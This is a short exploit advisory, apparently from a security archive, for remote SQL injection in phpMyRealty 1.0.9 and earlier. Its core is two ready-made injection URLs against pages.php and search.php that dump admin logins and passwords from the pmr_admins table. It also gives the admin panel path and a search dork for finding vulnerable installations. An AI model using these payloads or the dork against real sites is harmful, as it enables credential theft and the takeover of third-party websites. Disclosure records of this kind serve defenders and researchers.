phpMyRealty <= 1.0.9 Multiple Remote SQL Injection Vulnerabilities

2008.09.02
Credit: ~!Dok_tOR!~
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

phpMyRealty <= 1.0.9 (pages.php id) Remote SQL Injection Vulnerability Author: ~!Dok_tOR!~ Date found: 27.08.08 Product: phpMyRealty Version: 1.0.7, 1.0.9 Download script: http://rapidshare.com/files/123835319/phpMyRealty.v1.0.7.PHP-rs.rar Vulnerability Class: SQL Injection Exploit 1: http://localhost/[installdir]/pages.php?id=-999999+union+select+concat_ws(0x3a,login,password),2,3+from+pmr_admins/* Exploit 2: http://localhost/[installdir]/search.php?price_min=50000&price_max=-999999+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,login,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+from+pmr_admins/* Admin panel: http://localhost/[installdir]/admin/ Dork: Powered by phpMyRealty 1.0.7 Powered by phpMyRealty.com

References:

http://www.securityfocus.com/bid/30862


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top